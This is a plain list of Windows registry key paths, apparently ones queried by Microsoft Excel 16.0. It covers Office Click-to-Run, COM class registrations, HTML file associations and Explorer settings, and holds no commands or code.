HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InProcHandler32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\UseClusterConnector
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ClusterConnector
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DoNotCheckIfOfficeIsHTMLEditor
HKEY_LOCAL_MACHINE\Software\Microsoft\Shared\HTML
HKEY_LOCAL_MACHINE\Software\Microsoft\Shared\MHTML
HKEY_CLASSES_ROOT\.htm
HKEY_LOCAL_MACHINE\Software\Classes\.htm\(Default)
HKEY_CLASSES_ROOT\htmlfile\shell
HKEY_LOCAL_MACHINE\Software\Classes\htmlfile\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\htmlfile\shell\print\command
HKEY_LOCAL_MACHINE\Software\Classes\htmlfile\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\htmlfile\shell\print\command\(Default)
HKEY_CLASSES_ROOT\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\16
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\16\(Default)
HKEY_CLASSES_ROOT\.mht
HKEY_LOCAL_MACHINE\Software\Classes\.mht\(Default)
HKEY_CLASSES_ROOT\mhtmlfile\shell
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\print\command
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\print\command\(Default)
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office Test\Idle Task Manager
HKEY_CURRENT_USER\Software\Microsoft\Office Test\Idle Task Manager
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\OnlinePollTimeMs
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\OEM
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Office Application Guard PreWarm
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\ClickToRunLicensing
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ClickToRunLicensing
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\UseSentinelFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\NextUpdate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\NextUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\EXCEL.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\EXCEL.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\EXCEL.EXE\RequiredFile
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\EXCEL.EXE\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace_36354489
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace_36354489\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace_36354489
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace_41040327
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace_41040327\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace_41040327
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\Namespace\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\Namespace\ValidateRegItems
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\ValidateRegItems
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\Namespace\MonitorRegistry
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\MonitorRegistry
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParsingName_36354489
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParsingName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Icon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Security
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResourceType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Stream
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PublishExpandedPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Attributes
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\FolderTypeID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Desktop
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\SharedPC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SharedPC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SharedPC\SharedPCMode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\SharedPC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HubMode
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HubMode
HKEY_CURRENT_USER\Software\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes_36354489
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\FolderValueFlags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace_36354489
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace_36354489
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace_41040327
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace_41040327
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\ValidateRegItems
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\MonitorRegistry
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{70ce53cd-0000-0000-0000-500600000000}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{70ce53cd-0000-0000-0000-500600000000}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{70ce53cd-0000-0000-0000-500600000000}\Generation
HKEY_CURRENT_USER\Software\Classes\Drive\shellex\FolderExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Drive\shellex\FolderExtensions
HKEY_LOCAL_MACHINE\Software\Classes\Drive\shellex\FolderExtensions
HKEY_CURRENT_USER\Software\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKEY_LOCAL_MACHINE\Software\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKEY_LOCAL_MACHINE\Software\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer\UseFindFirstFileEnumeration
HKEY_CURRENT_USER\Software\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\LocalServer
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
